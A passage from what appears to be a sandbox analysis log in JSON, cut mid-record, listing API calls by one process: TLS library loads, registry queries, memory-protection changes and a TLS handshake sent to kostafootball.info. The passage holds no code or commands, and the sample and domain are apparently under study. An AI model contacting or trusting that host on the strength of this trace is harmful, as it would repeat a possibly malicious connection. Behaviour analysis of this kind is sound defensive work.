0, + "id": 792 + }, + { + "timestamp": "2025-03-07 21:41:28,765", + "thread_id": "7084", + "caller": "0x6db9ac5d", + "parentcaller": "0x7554234d", + "category": "device", + "api": "NtDeviceIoControlFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000364" + }, + { + "name": "IoControlCode", + "value": "0x0001202f", + "pretty_value": "IOCTL_AFD_GET_SOCK_NAME" + }, + { + "name": "InputBuffer", + "value": "" + }, + { + "name": "OutputBuffer", + "value": "\\x02\\x00\\xc3V\\xc0\\xa8{\\x0c\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 793 + }, + { + "timestamp": "2025-03-07 21:41:28,765", + "thread_id": "7084", + "caller": "0x756b8236", + "parentcaller": "0x7433f04e", + "category": "system", + "api": "DllLoadNotification", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "NotificationReason", + "value": "load" + }, + { + "name": "DllName", + "value": "C:\\Windows\\System32\\schannel" + }, + { + "name": "DllBase", + "value": "0x74640000" + } + ], + "repeated": 0, + "id": 794 + }, + { + "timestamp": "2025-03-07 21:41:28,765", + "thread_id": "7084", + "caller": "0x756b8236", + "parentcaller": "0x7433f04e", + "category": "system", + "api": "LdrLoadDll", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Flags", + "value": "0x00000000" + }, + { + "name": "FileName", + "value": "C:\\Windows\\SysWOW64\\schannel.dll" + }, + { + "name": "BaseAddress", + "value": "0x74640000" + } + ], + "repeated": 0, + "id": 795 + }, + { + "timestamp": "2025-03-07 21:41:28,765", + "thread_id": "7084", + "caller": "0x756bfbba", + "parentcaller": "0x7433eeeb", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "schannel.dll" + }, + { + "name": "ModuleHandle", + "value": "0x74640000" + }, + { + "name": "FunctionName", + "value": "SpUserModeInitialize" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x74648fe0" + } + ], + "repeated": 0, + "id": 796 + }, + { + "timestamp": "2025-03-07 21:41:28,765", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ab678", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 797 + }, + { + "timestamp": "2025-03-07 21:41:28,765", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000045c" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "System\\CurrentControlSet\\Control\\SecurityProviders\\Schannel" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\SecurityProviders\\Schannel" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 798 + }, + { + "timestamp": "2025-03-07 21:41:28,765", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000045c" + }, + { + "name": "ValueName", + "value": "UserContextLockCount" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\SecurityProviders\\SCHANNEL\\UserContextLockCount" + } + ], + "repeated": 0, + "id": 799 + }, + { + "timestamp": "2025-03-07 21:41:28,765", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000045c" + }, + { + "name": "ValueName", + "value": "UserContextListCount" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\SecurityProviders\\SCHANNEL\\UserContextListCount" + } + ], + "repeated": 0, + "id": 800 + }, + { + "timestamp": "2025-03-07 21:41:28,765", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x74649140", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000045c" + } + ], + "repeated": 0, + "id": 801 + }, + { + "timestamp": "2025-03-07 21:41:28,765", + "thread_id": "7084", + "caller": "0x74337592", + "parentcaller": "0x7434147b", + "category": "threading", + "api": "NtQueryInformationThread", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ThreadHandle", + "value": "0xfffffffe" + }, + { + "name": "ThreadInformationClass", + "value": "0", + "pretty_value": "ThreadBasicInformation" + }, + { + "name": "ThreadInformation", + "value": "\\x03\\x01\\x00\\x00\\x00\\x904\\x00\\xe8$\\x00\\x00\\xac\\x1b\\x00\\x00\\x03\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "ThreadId", + "value": "7084" + } + ], + "repeated": 0, + "id": 802 + }, + { + "timestamp": "2025-03-07 21:41:28,765", + "thread_id": "7084", + "caller": "0x756c7924", + "parentcaller": "0x7511c105", + "category": "system", + "api": "NtDuplicateObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "SourceProcessHandle", + "value": "0xffffffff" + }, + { + "name": "SourceHandle", + "value": "0xfffffffe" + }, + { + "name": "TargetProcessHandle", + "value": "0xffffffff" + }, + { + "name": "TargetHandle", + "value": "0x000004a0" + }, + { + "name": "Options", + "value": "0x00000002" + } + ], + "repeated": 0, + "id": 803 + }, + { + "timestamp": "2025-03-07 21:41:28,765", + "thread_id": "7084", + "caller": "0x74337dba", + "parentcaller": "0x7434249c", + "category": "threading", + "api": "NtQueryInformationThread", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ThreadHandle", + "value": "0xfffffffe" + }, + { + "name": "ThreadInformationClass", + "value": "0", + "pretty_value": "ThreadBasicInformation" + }, + { + "name": "ThreadInformation", + "value": "\\x03\\x01\\x00\\x00\\x00\\x904\\x00\\xe8$\\x00\\x00\\xac\\x1b\\x00\\x00\\x03\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "ThreadId", + "value": "7084" + } + ], + "repeated": 0, + "id": 804 + }, + { + "timestamp": "2025-03-07 21:41:28,765", + "thread_id": "7084", + "caller": "0x739fb419", + "parentcaller": "0x73a12d0d", + "category": "network", + "api": "WSASend", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Socket", + "value": "868" + }, + { + "name": "Buffer", + "value": "\\x16\\x03\\x03\\x00\\xb4\\x01\\x00\\x00\\xb0\\x03\\x03g\\xcbY\\xf8\\xe0k\\xb3\\x9d\\x99\\xc4\\x88\\xe5o\\xaf\n\\xb5G\\x02\\x91\\xb44\\xeb\\x1bbn\\xd1o}\\xef\\xf9 \\xcc\\x00\\x00&\\xc0,\\xc0+\\xc00\\xc0/\\xc0$\\xc0#\\xc0(\\xc0'\\xc0\n\\xc0\t\\xc0\\x14\\xc0\\x13\\x00\\x9d\\x00\\x9c\\x00=\\x00<\\x005\\x00/\\x00\n\\x01\\x00\\x00a\\x00\\x00\\x00\\x17\\x00\\x15\\x00\\x00\\x12kostafootball.info\\x00\\x05\\x00\\x05\\x01\\x00\\x00\\x00\\x00\\x00\n\\x00\\x08\\x00\\x06\\x00\\x1d\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00\\x00\r\\x00\\x1a\\x00\\x18\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x02\\x01\\x04\\x03\\x05\\x03\\x02\\x03\\x02\\x02\\x06\\x01\\x06\\x03\\x00#\\x00\\x00\\x00\\x17\\x00\\x00\\xff\\x01\\x00\\x01\\x00" + } + ], + "repeated": 0, + "id": 805 + }, + { + "timestamp": "2025-03-07 21:41:28,765", + "thread_id": "7084", + "caller": "0x770307f7", + "parentcaller": "0x770304ff", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x00541000" + }, + { + "name": "RegionSize", + "value": "0x00002000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 806 + }, + { + "timestamp": "2025-03-07 21:41:28,765", + "thread_id": "7084", + "caller": "0x739fce77", + "parentcaller": "0x739fc83e", + "category": "network", + "api": "WSARecv", + "status": false, + "return": "0xffffffffffffffff", + "arguments": [ + { + "name": "socket", + "value": "868" + } + ], + "repeated": 0, + "id": 807 + }, + { + "timestamp": "2025-03-07 21:41:29,203", + "thread_id": "7084", + "caller": "0x74337dba", + "parentcaller": "0x7434249c", + "category": "threading", + "api": "NtQueryInformationThread", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ThreadHandle", + "value": "0xfffffffe" + }, + { + "name": "ThreadInformationClass", + "value": "0", + "pretty_value": "ThreadBasicInformation" + }, + { + "name": "ThreadInformation", + "value": "\\x03\\x01\\x00\\x00\\x00\\x904\\x00\\xe8$\\x00\\x00\\xac\\x1b\\x00\\x00\\x03\\x00\\x00\\x00\\x07\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "ThreadId", + "value": "7084" + } + ], + "repeated": 0, + "id": 808 + }, + { + "timestamp": "2025-03-07 21:41:29,218", + "thread_id": "7084", + "caller": "0x739fb419", + "parentcaller": "0x73a12d0d", + "category": "network", + "api": "WSASend", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Socket", + "value": "868" + }, + { + "name": "Buffer", + "value": "\\x16\\x03\\x03\\x00%\\x10\\x00\\x00! \\xf4\\x97\\xc3\\xcf\\x8c\\x83\\x86\\xb27\\xd4\\xf6\\x84\\x01IO(A\\xccb~9\\x92\\xea\\x90=i\\x93\\x95\\xc6\\xde\\xe6#\\x14\\x03\\x03\\x00\\x01\\x01\\x16\\x03\\x03\\x00(\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00^\\x91\\xcf\\xa2\\xc3q\\xd7\\x9a\\xf2\\x95\\xdd\\xbd^\\x90\\x9e\\x10\\x80-e~r\\xfa\\x9f\\xc9\\x81\\x1eq\\x12\\x93O+\\x91" + } + ], + "repeated": 0, + "id": 809 + }, + { + "timestamp": "2025-03-07 21:41:29,218", + "thread_id": "7084", + "caller": "0x739fce77", + "parentcaller": "0x739fc83e", + "category": "network", + "api": "WSARecv", + "status": false, + "return": "0xffffffffffffffff", + "arguments": [ + { + "name": "socket", + "value": "868" + } + ], + "repeated": 0, + "id": 810 + }, + { + "timestamp": "2025-03-07 21:41:29,640", + "thread_id": "7084", + "caller": "0x74337dba", + "parentcaller": "0x7434249c", + "category": "threading", + "api": "NtQueryInformationThread", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ThreadHandle", + "value": "0xfffffffe" + }, + { + "name": "ThreadInformationClass", + "value": "0", + "pretty_value": "ThreadBasicInformation" + }, + { + "name": "ThreadInformation", + "value": "\\x03\\x01\\x00\\x00\\x00\\x904\\x00\\xe8$\\x00\\x00\\xac\\x1b\\x00\\x00\\x03\\x00\\x00\\x00\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "ThreadId", + "value": "7084" + } + ], + "repeated": 0, + "id": 811 + }, + { + "timestamp": "2025-03-07 21:41:29,640", + "thread_id": "7084", + "caller": "0x756b8236", + "parentcaller": "0x746580f9", + "category": "system", + "api": "LdrLoadDll", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Flags", + "value": "0x00000000" + }, + { + "name": "FileName", + "value": "sspicli.dll" + }, + { + "name": "BaseAddress", + "value": "0x74330000" + } + ], + "repeated": 0, + "id": 812 + }, + { + "timestamp": "2025-03-07 21:41:29,640", + "thread_id": "7084", + "caller": "0x756bfbba", + "parentcaller": "0x7465810e", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "SspiCli.dll" + }, + { + "name": "ModuleHandle", + "value": "0x74330000" + }, + { + "name": "FunctionName", + "value": "FreeContextBuffer" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x7433c960" + } + ], + "repeated": 0, + "id": 813 + }, + { + "timestamp": "2025-03-07 21:41:29,640", + "thread_id": "7084", + "caller": "0x756b8236", + "parentcaller": "0x74658125", + "category": "system", + "api": "DllLoadNotification", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "NotificationReason", + "value": "load" + }, + { + "name": "DllName", + "value": "C:\\Windows\\SYSTEM32\\mskeyprotect" + }, + { + "name": "DllBase", + "value": "0x74620000" + } + ], + "repeated": 0, + "id": 814 + }, + { + "timestamp": "2025-03-07 21:41:29,640", + "thread_id": "7084", + "caller": "0x756b8236", + "parentcaller": "0x74658125", + "category": "system", + "api": "DllLoadNotification", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "NotificationReason", + "value": "load" + }, + { + "name": "DllName", + "value": "C:\\Windows\\SYSTEM32\\NTASN1" + }, + { + "name": "DllBase", + "value": "0x743b0000" + } + ], + "repeated": 0, + "id": 815 + }, + { + "timestamp": "2025-03-07 21:41:29,640", + "thread_id": "7084", + "caller": "0x756b8236", + "parentcaller": "0x74658125", + "category": "system", + "api": "LdrLoadDll", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Flags", + "value": "0x00000000" + }, + { + "name": "FileName", + "value": "mskeyprotect.dll" + }, + { + "name": "BaseAddress", + "value": "0x74620000" + } + ], + "repeated": 0, + "id": 816 + }, + { + "timestamp": "2025-03-07 21:41:29,640", + "thread_id": "7084", + "caller": "0x756bfbba", + "parentcaller": "0x7465813a", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "mskeyprotect.dll" + }, + { + "name": "ModuleHandle", + "value": "0x74620000" + }, + { + "name": "FunctionName", + "value": "KeyFileProtectSessionTicket" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x74627770" + } + ], + "repeated": 0, + "id": 817 + }, + { + "timestamp": "2025-03-07 21:41:29,640", + "thread_id": "7084", + "caller": "0x756bfbba", + "parentcaller": "0x74658150", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "mskeyprotect.dll" + }, + { + "name": "ModuleHandle", + "value": "0x74620000" + }, + { + "name": "FunctionName", + "value": "KeyFileUnprotectSessionTicket" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x74627b10" + } + ], + "repeated": 0, + "id": 818 + }, + { + "timestamp": "2025-03-07 21:41:29,640", + "thread_id": "7084", + "caller": "0x770410cf", + "parentcaller": "0x7703f069", + "category": "process", + "api": "NtOpenSection", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "SectionHandle", + "value": "0x00000000" + }, + { + "name": "DesiredAccess", + "value": "0x0000000d" + }, + { + "name": "ObjectAttributes", + "value": "ncrypt.dll" + } + ], + "repeated": 0, + "id": 819 + }, + { + "timestamp": "2025-03-07 21:41:29,640", + "thread_id": "7084", + "caller": "0x7704216c", + "parentcaller": "0x77042076", + "category": "filesystem", + "api": "NtQueryAttributesFile", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "FileName", + "value": "C:\\Users\\pacop\\AppData\\Local\\Temp\\ncrypt.dll" + } + ], + "repeated": 0, + "id": 820 + }, + { + "timestamp": "2025-03-07 21:41:29,640", + "thread_id": "7084", + "caller": "0x7704216c", + "parentcaller": "0x77042076", + "category": "filesystem", + "api": "NtQueryAttributesFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileName", + "value": "C:\\Windows\\System32\\ncrypt.dll" + } + ], + "repeated": 0, + "id": 821 + }, + { + "timestamp": "2025-03-07 21:41:29,656", + "thread_id": "7084", + "caller": "0x7704e68c", + "parentcaller": "0x7704e3d8", + "category": "filesystem", + "api": "NtOpenFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x000004b8" + }, + { + "name": "DesiredAccess", + "value": "0x00100021", + "pretty_value": "FILE_READ_ACCESS|FILE_EXECUTE|SYNCHRONIZE" + }, + { + "name": "FileName", + "value": "C:\\Windows\\System32\\ncrypt.dll" + }, + { + "name": "ShareAccess", + "value": "5", + "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" + } + ], + "repeated": 0, + "id": 822 + }, + { + "timestamp": "2025-03-07 21:41:29,656", + "thread_id": "7084", + "caller": "0x7704e6c9", + "parentcaller": "0x7704e3d8", + "category": "process", + "api": "NtCreateSection", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "SectionHandle", + "value": "0x000004bc" + }, + { + "name": "DesiredAccess", + "value": "0x0000000d", + "pretty_value": "SECTION_QUERY|SECTION_MAP_READ|SECTION_MAP_EXECUTE" + }, + { + "name": "ObjectAttributes", + "value": "" + }, + { + "name": "FileHandle", + "value": "0x000004b8" + } + ], + "repeated": 0, + "id": 823 + }, + { + "timestamp": "2025-03-07 21:41:29,656", + "thread_id": "7084", + "caller": "0x7704125c", + "parentcaller": "0x770413c7", + "category": "process", + "api": "NtMapViewOfSection", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "SectionHandle", + "value": "0x000004bc" + }, + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x74380000" + }, + { + "name": "SectionOffset", + "value": "0x00000000" + }, + { + "name": "ViewSize", + "value": "0x00022000" + }, + { + "name": "Win32Protect", + "value": "0x00000080", + "pretty_value": "PAGE_EXECUTE_WRITECOPY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 824 + }, + { + "timestamp": "2025-03-07 21:41:29,656", + "thread_id": "7084", + "caller": "0x7704003f", + "parentcaller": "0x770407c4", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x7439c000" + }, + { + "name": "ModuleName", + "value": "ncrypt.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 825 + }, + { + "timestamp": "2025-03-07 21:41:29,656", + "thread_id": "7084", + "caller": "0x77051ed8", + "parentcaller": "0x77051e61", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x77119000" + }, + { + "name": "ModuleName", + "value": "ntdll.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00003000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "OldAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 826 + }, + { + "timestamp": "2025-03-07 21:41:29,656", + "thread_id": "7084", + "caller": "0x77051ed8", + "parentcaller": "0x77051e91", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x77119000" + }, + { + "name": "ModuleName", + "value": "ntdll.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00003000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 827 + }, + { + "timestamp": "2025-03-07 21:41:29,656", + "thread_id": "7084", + "caller": "0x77029d8b", + "parentcaller": "0x7703b4d0", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x7439b000" + }, + { + "name": "ModuleName", + "value": "ncrypt.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "OldAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 828 + }, + { + "timestamp": "2025-03-07 21:41:29,656", + "thread_id": "7084", + "caller": "0x7704e71d", + "parentcaller": "0x7704e3d8", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000004bc" + } + ], + "repeated": 0, + "id": 829 + }, + { + "timestamp": "2025-03-07 21:41:29,656", + "thread_id": "7084", + "caller": "0x7704e725", + "parentcaller": "0x7704e3d8", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000004b8" + } + ], + "repeated": 0, + "id": 830 + }, + { + "timestamp": "2025-03-07 21:41:29,656", + "thread_id": "7084", + "caller": "0x77040d40", + "parentcaller": "0x7702e4d3", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x7439b000" + }, + { + "name": "ModuleName", + "value": "ncrypt.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 831 + }, + { + "timestamp": "2025-03-07 21:41:29,656", + "thread_id": "7084", + "caller": "0x74269799", + "parentcaller": "0x7426950b", + "category": "system", + "api": "LdrGetDllHandle", + "status": false, + "return": "0xffffffffc0000135", + "pretty_return": "DLL_NOT_FOUND", + "arguments": [ + { + "name": "FileName", + "value": "DDRAW.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 832 + }, + { + "timestamp": "2025-03-07 21:41:29,656", + "thread_id": "7084", + "caller": "0x74269799", + "parentcaller": "0x7426950b", + "category": "system", + "api": "LdrGetDllHandle", + "status": false, + "return": "0xffffffffc0000135", + "pretty_return": "DLL_NOT_FOUND", + "arguments": [ + { + "name": "FileName", + "value": "D3D8.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x00000000" + } + ], + "repeated": 0, + "id": 833 + }, + { + "timestamp": "2025-03-07 21:41:29,656", + "thread_id": "7084", + "caller": "0x74269799", + "parentcaller": "0x7426950b", + "category": "system", + "api": "LdrGetDllHandle", + "status": false, + "return": "0xffffffffc0000135", + "pretty_return": "DLL_NOT_FOUND", + "arguments": [ + { + "name": "FileName", + "value": "D3D9.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 834 + }, + { + "timestamp": "2025-03-07 21:41:29,656", + "thread_id": "7084", + "caller": "0x74269951", + "parentcaller": "0x74268d22", + "category": "misc", + "api": "RtlDosPathNameToNtPathName_U", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "DosFileName", + "value": "C:\\Windows\\SYSTEM32\\ncrypt.dll" + } + ], + "repeated": 0, + "id": 835 + }, + { + "timestamp": "2025-03-07 21:41:29,656", + "thread_id": "7084", + "caller": "0x74269990", + "parentcaller": "0x74268d22", + "category": "filesystem", + "api": "NtOpenFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x000004b8" + }, + { + "name": "DesiredAccess", + "value": "0x00020000", + "pretty_value": "READ_CONTROL" + }, + { + "name": "FileName", + "value": "C:\\Windows\\System32\\ncrypt.dll" + }, + { + "name": "ShareAccess", + "value": "5", + "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" + } + ], + "repeated": 0, + "id": 836 + }, + { + "timestamp": "2025-03-07 21:41:29,656", + "thread_id": "7084", + "caller": "0x74269a31", + "parentcaller": "0x74268d22", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000004b8" + } + ], + "repeated": 0, + "id": 837 + }, + { + "timestamp": "2025-03-07 21:41:29,656", + "thread_id": "7084", + "caller": "0x74269a31", + "parentcaller": "0x74268d22", + "category": "system", + "api": "DllLoadNotification", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "NotificationReason", + "value": "load" + }, + { + "name": "DllName", + "value": "C:\\Windows\\SYSTEM32\\ncrypt" + }, + { + "name": "DllBase", + "value": "0x74380000" + } + ], + "repeated": 0, + "id": 838 + }, + { + "timestamp": "2025-03-07 21:41:29,656", + "thread_id": "7084", + "caller": "0x7703feff", + "parentcaller": "0x7703fdf4", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x7439c000" + }, + { + "name": "ModuleName", + "value": "ncrypt.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "OldAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 839 + }, + { + "timestamp": "2025-03-07 21:41:29,656", + "thread_id": "7084", + "caller": "0x7703ff34", + "parentcaller": "0x7703fdf4", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x7439c000" + }, + { + "name": "ModuleName", + "value": "ncrypt.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 840 + }, + { + "timestamp": "2025-03-07 21:41:29,656", + "thread_id": "7084", + "caller": "0x7703ff34", + "parentcaller": "0x7703fdf4", + "category": "system", + "api": "LdrpCallInitRoutine", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "MappedPath", + "value": "\\Device\\HarddiskVolume2\\Windows\\SysWOW64\\ncrypt" + }, + { + "name": "BaseAddress", + "value": "0x74380000" + }, + { + "name": "InitRoutine", + "value": "0x743887d0" + }, + { + "name": "Reason", + "value": "1" + } + ], + "repeated": 0, + "id": 841 + }, + { + "timestamp": "2025-03-07 21:41:29,656", + "thread_id": "7084", + "caller": "0x7703feff", + "parentcaller": "0x7703fdf4", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x746b5000" + }, + { + "name": "ModuleName", + "value": "schannel.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "OldAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 842 + }, + { + "timestamp": "2025-03-07 21:41:29,656", + "thread_id": "7084", + "caller": "0x7703ff34", + "parentcaller": "0x7703fdf4", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": 